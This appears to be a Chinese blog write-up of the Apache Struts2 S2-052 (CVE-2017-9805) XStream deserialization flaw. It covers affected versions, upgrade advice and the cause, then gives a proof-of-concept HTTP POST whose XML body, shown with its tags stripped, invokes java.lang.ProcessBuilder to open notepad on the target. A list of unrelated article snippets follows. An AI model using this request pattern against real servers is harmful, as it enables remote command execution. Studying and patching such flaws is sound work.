Jewel591
Jewel591

Struts2 : S2 - 052

ps:关于Java反序列化原理,请参见:Java反序列化漏洞原理

漏洞介绍

Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-052,CVE编号CVE-2017-9805。

Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。

  • 影响范围:

Struts 2.5 - Struts 2.5.12

  • 不受影响的版本:

Struts 2.5.13

  • 快速检测方式:

使用知道创宇SeeBug可以直接检测站点是否存在本漏洞

  • 防护策略建议
  1. 升级Struts2至2.5.13。
  2. 删除2.5.12以及之前版本的rest-showcaseWAR包。
  3. 部署HanSight企业版和HanSight NTA,接入Web服务器流量和日志,及时处理告警。

漏洞原理

S2-052漏洞,源于REST插件处理XML反序列化请求时没有做任何过滤或验证,直接解析处理(将XML反序列化成Java Object),所以存在安全隐患、可以远程攻击。
(所以还是那句话:一切外来输入都是不可信的!)

Struts2 : S2 - 052_第1张图片
Struts2 : S2 - 052_第2张图片

通过精心构造的XML反序列化请求可以使得服务器执行任何命令:


Struts2 : S2 - 052_第3张图片

利用POC

#此poc为打开目标系统notepad软件
POST /struts2-rest-showcase/orders/3/edit;jsessionid=F455F4577F3AC37C743B888B17C7A05E HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 1659
Referer: http://127.0.0.1:8080/orders/3/edit
Cookie: JSESSIONID=F455F4577F3AC37C743B888B17C7A05E
Connection: close
Upgrade-Insecure-Requests: 1


 
 
 0      false 0     C:\Windows\System32\notepad  false     java.lang.ProcessBuilder start   foo  foo      false 0 0 false  false    0

发现一个大表哥写的非常详细:http://www.sohu.com/a/190287874_99907709

你可能感兴趣的:(Struts2 : S2 - 052)

  • 【c++】leetcode5 最长回文子串
    1.题目5.最长回文子串-力扣(LeetCode)2.codeclassSolution{public:stringlongestPalindrome(strings){stringres="";for(autoi=0U;ires.length()?s1:res;res=s2.length()>res.length()?s2:res;}returnres;}stringpalindrome(str
  • 华为路由器PPP MP与CHAP验证实验详解 神秘人X707 网络服务器
    实验拓扑图实验目的R1和R2使用PPP链路直连,R2和R3把2条PPP链路捆绑为PPPMP直连按照图示配置IP地址R2对R1的PPP进行单向chap验证R2和R3的PPP进行双向chap验证实验步骤1.R1和R2使用PPP链路直连,R2和R3把2条PPP链路捆绑为PPPMP直连步骤一在R2上创建MP-GROUP口[R2]intMP-group1步骤二把S1/0和S2/0加入到上一步创建的MP-GR
  • DAY2——Python 基础变量类型之字符串和数字类型 .venn PYTHON学习python开发语言算法
    字符串类型(str)字符串是Python中最常用的数据类型之一,用于表示文本信息。字符串可以用单引号('')、双引号("")或三引号(''''''或"""""")定义。三引号通常用于多行字符串。字符串是不可变序列,支持索引和切片操作。以下是一些常见操作:#定义字符串s1='hello's2="world"s3='''Thisisamulti-linestring'''#字符串拼接combined=
  • pta 删除字符串中的子串 paintstar pta记录c++算法数据结构
    输入2个字符串S1和S2,要求删除字符串S1中出现的所有子串S2,即结果字符串中不能包含S2。输入格式:输入在2行中分别给出不超过80个字符长度的、以回车结束的2个非空字符串,对应S1和S2。输出格式:在一行中输出删除字符串S1中出现的所有子串S2后的结果字符串。输入样例:Tomcatisamaleccatatcat输出样例:Tomisamale代码长度限制16KB时间限制400ms内存限制64M
  • 第六十二天 服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP 清歌secure 网络安全全栈学习笔记安全springstruts
    第62天服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP知识点:中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere,Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flas
  • 高校毕业设计选题管理系统的SSH框架实现 Kiki-2189
    本文还有配套的精品资源,点击获取简介:该系统基于SSH架构(Struts2、Spring和Hibernate)建立,旨在简化和优化高校毕业设计的选题流程,提高教学管理效率。系统根据角色(管理员、教师、学生)分配不同功能与权限,涵盖用户管理、课题发布与审核、文档提交和评估等。采用了JSP技术进行用户界面的构建,并利用SSH框架的特性简化了开发流程,提高了系统的稳定性和交互性。1.SSH框架应用于Ja
  • Python中字符串的操作方法 幻鸩605 pythonjava开发语言
    字符串拼接使用+运算符将多个字符串连接起来。例如:s1="Hello"s2="World"result=s1+""+s2print(result)#输出:HelloWorld字符串重复使用*运算符重复字符串。例如:s="abc"result=s*3print(result)#输出:abcabcabc字符串长度使用len()函数获取字符串长度。例如:s="Python"length=len(s)pr
  • Python中字符串的操作 Clear love..... pythonjava服务器
    一、字符串操作字符串连接s1="Hello"s2="World"print(s1+""+s2)#HelloWorld字符串重复print("Ha"*3)#HaHaHa字符串长度s="Python"print(len(s))#6二、字符串索引与切片索引访问s="Python"print(s[0])#'P'(第一个字符)print(s[-1])#'n'(最后一个字符)切片操作s="PythonProg
  • JAVA——JAVA知识点集锦(下) Faith_chao JAVA基础JAVA基础知识点
    转自:http://blog.csdn.net/Scythe666/article/details/51994782这部分主要是开源JavaEE框架方面的内容,包括Hibernate、MyBatis、Spring、SpringMVC等,由于Struts2已经是明日黄花,在这里就不讨论Struts2的面试题,如果需要了解相关内容,可以参考我的另一篇文章《Java面试题集(86-115)》。此外,这篇
  • c++求同构数 *Allen* c++算法数据结构
    题目描述所谓同构数是指这样的数,即它出现在它的平方数的右端。例如,5的平方是25(即5×5=25),5是25右端的数,那么5就是同构数。又如,25的平方是625(即25×25=625),同理25也是同构数。找出通过键盘输入的两个正整数N和M(0usingnamespacestd;intn,m,t,s,a[100],b[100],sum,s1,s2,k;intmain(){cin>>n>>m;for
  • C语言常用转换函数实现原理 hie98894 c
    编程时,经常用到进制转换、字符转换。比如软件界面输入的数字字符串,如何将字符串处理成数字呢?今天就和大家分享一下。01字符串转十六进制代码实现:void StrToHex(char *pbDest, char *pbSrc, int nLen){  char h1,h2;  char s1,s2;  int i;    for (i=0; i    {        h1 = pbSrc[2*i]
  • BAAI/BGE-VL多模态模型部署、原理、代码详解(实现图像文本混合检索),包含BEG-VL多模态模型的本地部署详细步骤及代码原理解析 令令小宁 python语言模型自然语言处理nlp人工智能
    本文包含BGE-VL多模态模型的本地部署详细步骤及代码原理解析文章目录前言一、模型下载二、计算流程解析1.BGE-VL-base/Large2.BGE-VL-MLLM-s1/s2三、总结前言提示:这里可以添加本文要记录的大概内容:包含四个模型及数据集,数据集未开源,四个模型可以分别下载:其中,BGE-VL-base/Large是基于CLIP训练的模型,BGE-VL-MLLM-S1/S2是基于LLM
  • 小米发布会定档,自研芯片、小米 YU7将亮相,参数先睹为快
    5月19日,有消息称,小米将在5月22日举行的15周年战略发布会上一口气公布两件重磅新——自研手机SoC芯片玄戒O1,以及首款纯电SUV车型YU7。玄戒O1:4nm工艺、Arm最新架构、性能对标骁龙8Gen2在芯片领域,小米的十年蛰伏终于迎来阶段性成果。自2014年松果电子成立以来,小米经历了澎湃S1的市场失利、S2流片失败等挫折,但2024年成功流片的3纳米工艺手机SoC玄戒O1,标志着其正式跻
  • 【蓝队】XX集团股份有限公司体系化监测挖掘抵御0day漏洞防护技战法|护网|高级|研判|监测|hw chenyzzz 蓝队网络安全网络安全系统安全web安全安全架构0day
    2025重点关注MetaCRM客户关系管理系统sendfile.jsp任意文件上传MetaCRM客户关系管理系统sendsms.jsp任意文件上传AgentSyste代理商管理系统login.actionStruts2远程代码执行用友NClistUserSharingEvents存在SQL注入浪潮云财务系统存在远程代码执行一、工作背景与现状分析0day漏洞是指尚未被漏洞所在软硬件系统的厂商或开发者
  • Spring -- IOC Sanqi_isshou JavaSpringjavaspringioc容器
    一、springspringmvcspringboot关系spring是一个轻量级框架,为简化开发,它封装了一系列开箱即用的组件功能模块,可以接管web层,dao层等。核心是IOC容器和AOP面向切面编程。springmvc是用于开发springweb项目的mvc技术框架实现,是struts2+spring的整合,代替了servlet的处理响应请求,表单校验等作用。springmvc原理图spri
  • UVA489刽子手游戏 HUN金克斯 CCFCSP训练游戏算法CCFc++
    UVA489刽子手的游戏HangmanJudge-洛谷#includeusingnamespacestd;boolarr[26];intmain(){intn;while(cin>>n&&n!=-1){strings1,s2;memset(arr,0,sizeof(arr));cout>s1>>s2;intlose=0,win=0,sum=0;intlen1=s1.size(),len2=s2.s
  • 【LC#392&&70】判断子序列&&爬楼梯(dp算法 第一期)
    392.判断子序列-力扣(LeetCode)给定字符串s和t,判断s是否为t的子序列。字符串的一个子序列是原始字符串删除一些(也可以不删除)字符而不改变剩余字符相对位置形成的新字符串。(例如,"ace"是"abcde"的一个子序列,而"aec"不是)。进阶:如果有大量输入的S,称作S1,S2,...,Sk其中k>=10亿,你需要依次检查它们是否为T的子序列。在这种情况下,你会怎样改变代码?致谢:特
  • 【LeetCode】1247. 交换字符使得字符串相同 Schanappi LeetCode刷题leetcode算法数据结构
    1247.交换字符使得字符串相同题目描述有两个长度相同的字符串s1和s2,且它们其中只含有字符“x”和“y”,你需要通过「交换字符」的方式使这两个字符串相同。每次「交换字符」的时候,你都可以在两个字符串中各选一个字符进行交换。交换只能发生在两个不同的字符串之间,绝对不能发生在同一个字符串内部。也就是说,我们可以交换s1[i]和s2[j],但不能交换s1[i]和s1[j]。最后,请你返回使s1和s2
  • 华为OD机试_2025 B卷_最少面试官数(Python,100分)(附详细解题思路) 蜗牛的旷野 华为OD机试Python版华为odpython开发语言
    题目描述某公司组织一场公开招聘活动,假设由于人数和场地的限制,每人每次面试的时长不等,并已经安排给定,用(S1,E1)、(S2,E2)、(Sj,Ej)…(Simax_overlap:max_overlap=current#计算满足场次限制的最小需求min_by_count=math.ceil(n/m)#取两个约束的最大值result=max(min_by_count,max_overlap)pri
  • SpringMVC与Struts2对比教学 长勺 Springstrutsjava后端
    SpringMVC和Struts2就像武林中的两大门派,虽然都是处理Web请求的高手(MVC框架),但招式风格和内功心法大不相同。来,咱们用最接地气的方式掰扯掰扯,保准你笑着记住!核心区别一句话概括:Struts2像是个“中央集权”的大家长,啥事儿都得经过它规定的流程(拦截器栈);SpringMVC则像是个“自由灵活”的居委会,搭好平台让大家(各种组件)按约定自己玩儿(依赖注入+IoC),它主要当
  • 样本与抽样分布:统计推断的基石 Algo-hx 概率论与数理统计概率论
    目录引言6样本与抽样分布6.1总体与样本核心概念6.2统计量:样本的数学摘要定义常用统计量重要性质证明:E(S2)=σ2E(S^2)=\sigma^2E(S2)=σ26.3三大抽样分布:统计推断的支柱6.3.1χ2\chi^2χ2分布:多个独立标准正态分布变量的平方和定义性质6.3.2ttt分布(学生氏分布)定义性质6.3.3FFF分布定义性质6.4正态总体的抽样分布定理6.4.1单正态总体情形6
  • 深入剖析Redis Cluster集群,Redis持久化机制,Redis数据类型及其数据结构 LiRuiJie Redisredis架构数据库
    一、RedisCluster高可用部署方案1.部署拓扑设计(推荐)为了保证高可用+扩展性+性能,建议采用:6主6从结构(12实例)每个主节点管理2,738个slot,总计16,384个slot节点分布:┌─────────────┬──────────────┐│主节点M1│从节点S1(备份M1)││主节点M2│从节点S2(备份M2)││主节点M3│从节点S3(备份M3)││主节点M4│从节点S4
  • 蓝桥杯第十届国B 求值 咚咚轩 蓝桥杯
    题目描述本题为填空题,只需要算出结果后,在代码中使用输出语句将所填结果输出即可。学习了约数后,小明对于约数很好奇,他发现,给定一个正整数t,总是可以找到含有t个约数的整数。小明对于含有t个约数的最小数非常感兴趣,并把它定义为St。例如S1=1,S2=2,S3=4,S4=6,⋅⋅⋅。现在小明想知道,当t=100时,St是多少?即S100是多少?#includeusingnamespacestd;in
  • 深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞 Bruce_xiaowei 笔记总结经验struts安全web安全
    深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞前言在网络安全领域,漏洞的发现与修复是永恒的主题。本文将深入分析两个历史上影响深远的安全漏洞:OpenSSL心脏滴血漏洞和Struts2系列远程命令执行漏洞。这些漏洞不仅在当时造成了广泛影响,其背后的原理和防御思路至今仍具有重要的学习价值。第一部分:OpenSSL心脏滴血漏洞(Heartbleed)漏洞概述心脏滴血漏洞(Heartb
  • shiro、struts2、weblogic特征流量分析 桑晒. struts网络安全web安全
    文章目录一、Shiro漏洞流量特征1.**身份验证阶段的特征**2.**攻击阶段的特征**3.**检测与防御建议**二、Struts2漏洞流量特征1.**请求特征**2.**响应特征**3.**典型案例**4.**防御建议**三、WebLogic漏洞流量特征1.**XMLDecoder反序列化(CVE-2017-10271)**2.**SSRF漏洞(CVE-2014-4210)**3.**T3协议
  • leetcode 1061. 按字典序排列最小的等效字符串 中等 圣保罗的大教堂 leetcodeleetcode
    给出长度相同的两个字符串s1和s2,还有一个字符串baseStr。其中s1[i]和s2[i]是一组等价字符。举个例子,如果s1="abc"且s2="cde",那么就有'a'=='c','b'=='d','c'=='e'。等价字符遵循任何等价关系的一般规则:自反性:'a'=='a'对称性:'a'=='b'则必定有'b'=='a'传递性:'a'=='b'且'b'=='c'就表明'a'=='c'例如,s
  • 408计算机考研--数据结构--2020年统考真题(C语言) Immature_7 算法数据结构算法数据结构
    2020年408统考真题(C语言)一、题目描述定义三元组(a,b,c)(a、b、c均为正数)的距离D=|a-b|+|b-c|+|c-a|。给定3个非空整数集合S1、S2、S3,按升序分别存储在3个数组中。请设计一个尽可能高效的算法,计算并输出所有可能的三元组(a,b,c)(a∈S1,b∈S2,c∈S3)中的最小距离。例如S1={-1,0,9},S2={-25,-10,10,11},S3={2,9,
  • 【力扣题解 Day 6】1061. 按字典序排列最小的等效字符串 阳明YM 力扣(LeetCode)python算法力扣
    【力扣题解Day6】1061.按字典序排列最小的等效字符串问题思路解题过程复杂度Code问题Problem:1061.按字典序排列最小的等效字符串思路模拟解题过程并查集是更好的做法,希望下次能用上。对于本题,容易想到构建一个列表,列表中的每个元素表示s1和s2的等价字符集合,这样我们只需要遍历baseStr中的每个字符,在列表中寻找每个字符对应的字典序最小的等价字符进行替换就可以得到最终的结果。那
  • Fisher准则例题——给定类内散度矩阵和类样本均值 phoenix@Capricornus PR书稿机器学习
    设有两类样本,两类样本的类内散度矩阵分别为S1=(11/21/21),S2=(1−1/2−1/21)S_1=\begin{pmatrix}1&1/2\\1/2&1\end{pmatrix},\quadS_2=\begin{pmatrix}1&-1/2\\-1/2&1\end{pmatrix}S1=(11/21/21),S2=(1−1/2−1/21)各类样本均值分别为μ1=(2,0)⊤和μ2=(2,
  • SSH2框架实例源码:用户登录与管理功能实践 我有特别的生活方法
    本文还有配套的精品资源,点击获取简介:SSH2框架结合Spring3.2、Struts22.3.4和Hibernate4.2,提供了一套完整的用户登录和管理功能实现。文章详细探讨了这些技术的应用,包括它们在项目中的具体作用和集成方式。1.SSH2框架的介绍与集成在现代Web开发中,SSH2框架(Spring,Struts2,Hibernate)的组合曾是广泛采用的一种技术栈,它集成了企业级应用开发
  • Java 并发包之线程池和原子计数 lijingyao8206 Java计数ThreadPool并发包java线程池
    对于大数据量关联的业务处理逻辑,比较直接的想法就是用JDK提供的并发包去解决多线程情况下的业务数据处理。线程池可以提供很好的管理线程的方式,并且可以提高线程利用率,并发包中的原子计数在多线程的情况下可以让我们避免去写一些同步代码。     这里就先把jdk并发包中的线程池处理器ThreadPoolExecutor 以原子计数类AomicInteger 和倒数计时锁C
  • java编程思想 抽象类和接口 百合不是茶 java抽象类接口
    接口c++对接口和内部类只有简介的支持,但在java中有队这些类的直接支持   1 ,抽象类 :  如果一个类包含一个或多个抽象方法,该类必须限定为抽象类(否者编译器报错)   抽象方法 : 在方法中仅有声明而没有方法体    package com.wj.Interface;
  • [房地产与大数据]房地产数据挖掘系统 comsci 数据挖掘
           随着一个关键核心技术的突破,我们已经是独立自主的开发某些先进模块,但是要完全实现,还需要一定的时间...        所以,除了代码工作以外,我们还需要关心一下非技术领域的事件..比如说房地产     &nb
  • 数组队列总结 沐刃青蛟 数组队列
          数组队列是一种大小可以改变,类型没有定死的类似数组的工具。不过与数组相比,它更具有灵活性。因为它不但不用担心越界问题,而且因为泛型(类似c++中模板的东西)的存在而支持各种类型。      以下是数组队列的功能实现代码:   import List.Student; public class
  • Oracle存储过程无法编译的解决方法 IT独行者 oracle存储过程 
    今天同事修改Oracle存储过程又导致2个过程无法被编译,流程规范上的东西,Dave 这里不多说,看看怎么解决问题。   1.     查看无效对象 XEZF@xezf(qs-xezf-db1)> select object_name,object_type,status from all_objects where status='IN
  • 重装系统之后oracle恢复 文强chu oracle
    前几天正在使用电脑,没有暂停oracle的各种服务。 突然win8.1系统奔溃,无法修复,开机时系统 提示正在搜集错误信息,然后再开机,再提示的无限循环中。 无耐我拿出系统u盘 准备重装系统,没想到竟然无法从u盘引导成功。 晚上到外面早了一家修电脑店,让人家给装了个系统,并且那哥们在我没反应过来的时候, 直接把我的c盘给格式化了 并且清理了注册表,再装系统。 然后的结果就是我的oracl
  • python学习二( 一些基础语法) 小桔子 pthon基础语法
    紧接着把!昨天没看继续看django 官方教程,学了下python的基本语法 与c类语言还是有些小差别: 1.ptyhon的源文件以UTF-8编码格式 2. /   除 结果浮点型 //  除 结果整形 %   除 取余数 *   乘 **  乘方 eg 5**2 结果是5的2次方25 _&
  • svn 常用命令 aichenglong SVN版本回退
    1 svn回退版本   1)在window中选择log,根据想要回退的内容,选择revert this version或revert chanages from this version 两者的区别:   revert this version:表示回退到当前版本(该版本后的版本全部作废)   revert chanages from this versio
  • 某小公司面试归来 alafqq 面试
    先填单子,还要写笔试题,我以时间为急,拒绝了它。。时间宝贵。 老拿这些对付毕业生的东东来吓唬我。。 面试官很刁难,问了几个问题,记录下; 1,包的范围。。。public,private,protect. --悲剧了 2,hashcode方法和equals方法的区别。谁覆盖谁.结果,他说我说反了。 3,最恶心的一道题,抽象类继承抽象类吗?(察,一般它都是被继承的啊) 4,stru
  • 动态数组的存储速度比较 集合框架 百合不是茶 集合框架
    集合框架: 自定义数据结构(增删改查等) package 数组; /** * 创建动态数组 * @author 百合 * */ public class ArrayDemo{ //定义一个数组来存放数据 String[] src = new String[0]; /** * 增加元素加入容器 * @param s要加入容器
  • 用JS实现一个JS对象,对象里有两个属性一个方法 bijian1013 js对象
    <html> <head> </head> <body> 用js代码实现一个js对象,对象里有两个属性,一个方法 </body> <script> var obj={a:'1234567',b:'bbbbbbbbbb',c:function(x){
  • 探索JUnit4扩展:使用Rule bijian1013 java单元测试JUnitRule
            在上一篇文章中,讨论了使用Runner扩展JUnit4的方式,即直接修改Test Runner的实现(BlockJUnit4ClassRunner)。但这种方法显然不便于灵活地添加或删除扩展功能。下面将使用JUnit4.7才开始引入的扩展方式——Rule来实现相同的扩展功能。 1. Rule       &n
  • [Gson一]非泛型POJO对象的反序列化 bit1129 POJO
    当要将JSON数据串反序列化自身为非泛型的POJO时,使用Gson.fromJson(String, Class)方法。自身为非泛型的POJO的包括两种: 1. POJO对象不包含任何泛型的字段 2. POJO对象包含泛型字段,例如泛型集合或者泛型类 Data类 a.不是泛型类, b.Data中的集合List和Map都是泛型的 c.Data中不包含其它的POJO    
  • 【Kakfa五】Kafka Producer和Consumer基本使用 bit1129 kafka
    0.Kafka服务器的配置 一个Broker, 一个Topic Topic中只有一个Partition()   1. Producer: package kafka.examples.producers; import kafka.producer.KeyedMessage; import kafka.javaapi.producer.Producer; impor
  • lsyncd实时同步搭建指南——取代rsync+inotify ronin47
    1. 几大实时同步工具比较 1.1 inotify + rsync 最近一直在寻求生产服务服务器上的同步替代方案,原先使用的是 inotify + rsync,但随着文件数量的增大到100W+,目录下的文件列表就达20M,在网络状况不佳或者限速的情况下,变更的文件可能10来个才几M,却因此要发送的文件列表就达20M,严重减低的带宽的使用效率以及同步效率;更为要紧的是,加入inotify
  • java-9. 判断整数序列是不是二元查找树的后序遍历结果 bylijinnan java
    public class IsBinTreePostTraverse{ static boolean isBSTPostOrder(int[] a){ if(a==null){ return false; } /*1.只有一个结点时,肯定是查找树 *2.只有两个结点时,肯定是查找树。例如{5,6}对应的BST是 6 {6,5}对应的BST是
  • MySQL的sum函数返回的类型 bylijinnan javaspringsqlmysqljdbc
    今天项目切换数据库时,出错 访问数据库的代码大概是这样: String sql = "select sum(number) as sumNumberOfOneDay from tableName"; List<Map> rows = getJdbcTemplate().queryForList(sql); for (Map row : rows
  • java设计模式之单例模式 chicony java设计模式
    在阎宏博士的《JAVA与模式》一书中开头是这样描述单例模式的:   作为对象的创建模式,单例模式确保某一个类只有一个实例,而且自行实例化并向整个系统提供这个实例。这个类称为单例类。 单例模式的结构   单例模式的特点: 单例类只能有一个实例。 单例类必须自己创建自己的唯一实例。 单例类必须给所有其他对象提供这一实例。   饿汉式单例类   publ
  • javascript取当月最后一天 ctrain JavaScript
    <!--javascript取当月最后一天--> <script language=javascript> var current = new Date(); var year = current.getYear(); var month = current.getMonth(); showMonthLastDay(year, mont
  • linux tune2fs命令详解 daizj linuxtune2fs查看系统文件块信息
    一.简介: tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检,而且是可以通过tune2fs命令,自行定义自检周期及方式。 二.用法: Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
  • 做有中国特色的程序员 dcj3sjt126com 程序员
      从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有
  • Android:TextView属性大全 dcj3sjt126com textview
    android:autoLink    设置是否当文本为URL链接/email/电话号码/map时,文本显示为可点击的链接。可选值(none/web/email/phone/map/all)  android:autoText    如果设置,将自动执行输入值的拼写纠正。此处无效果,在显示输入法并输
  • tomcat虚拟目录安装及其配置 eksliang tomcat配置说明tomca部署web应用tomcat虚拟目录安装
    转载请出自出处:http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat  目录结构 config:存放tomcat的配置文件 temp  :存放tomcat跑起来后存放临时文件用的 work   : 当第一次访问应用中的jsp
  • 浅谈:APP有哪些常被黑客利用的安全漏洞 gg163 APP
    首先,说到APP的安全漏洞,身为程序猿的大家应该不陌生;如果抛开安卓自身开源的问题的话,其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上,有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测(ineice.com)的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞:APK 包非常容易被反编译成可读
  • C#根据网址生成静态页面 hvt Web.netC#asp.nethovertree
    HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页,以及显示用户名,退出等功能。根据网址生成页面的方法:   bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
  • SVG 教程 (一) 天梯梦 svg
    SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。 学习之前应具备的基础知识: 继续学习之前,你应该对以下内容有基本的了解: HTML XML 基础 如果希望首先学习这些内容,请在本站的首页选择相应的教程。 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
  • 一个简单的java栈 luyulong java数据结构
    public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
  • 基础数据结构和算法八:Binary search sunwinner AlgorithmBinary search
    Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
  • 12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 刘星宇 c面试
    12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 1.gets()函数 问:请找出下面代码里的问题: #include<stdio.h> int main(void) {     char buff[10];     memset(buff,0,sizeof(buff));
  • ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员 活动ITeye试读
    ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾: http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《Java性能优化权威指南》
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他